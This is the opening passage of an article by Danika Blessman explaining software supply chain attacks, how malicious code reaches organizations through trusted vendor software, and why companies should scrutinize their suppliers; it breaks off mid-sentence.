Protecting Your Software Supply Chain.

• Author: Blessman, Danika
• Position: FOREFRONT

A software supply chain is the complex web of components within an organization's trusted downloaded software applications--the pieces of code used to construct operational, communication and network utility programs, as well as common third-party business applications like word processing, database, spreadsheet and content management software. Code originates from all over the globe and is then aggregated and integrated into branded products. This complexity can result in significant vulnerability within any company's infrastructure.

Software supply chain attacks typically aim to gain access to sensitive data on the target network, most often for financial gain or to tarnish a company's reputation. Even if a company has a robust cybersecurity program, a threat actor could access the company's network after replacing one of its most commonly used tools or office applications with their own malevolent version somewhere between the manufacturing and network installation stages.

As complicated as a software supply chain can become due to the immense number of "moving parts," it is essential that an organization understand all of the components in order to protect its network from incoming threats. Attacks on a software supply chain can present a challenge to an organization's security posture since vulnerabilities in many of these software programs are difficult to detect and many organizations simply trust that their vendors are providing secure software. While 90% of respondents in a recent survey by cybersecurity firm Crowdstrike said that software supply chain attacks resulted in an average financial cost of $1.1 million, only 71 % of those same respondents held software vendors in their supply chain to the same security standards they set for their own company. This poses a huge opportunity for threat actors as they do not have to defeat an organization's security procedures, they only have to compromise a trusted third-party in the supply chain.

Until recently, software supply chain attacks were not considered as great a risk as other, more well-known threats like ransomware. Over the past 12 months, however, open-source software supply chain attacks have increased in frequency.

WHAT IS A SOFTWARE SUPPLY CHAIN ATTACK?

Simply put, an attack against a targeted software supply chain occurs when malicious code is inserted into otherwise legitimate software, usually a trusted application. This application is then distributed, either for an...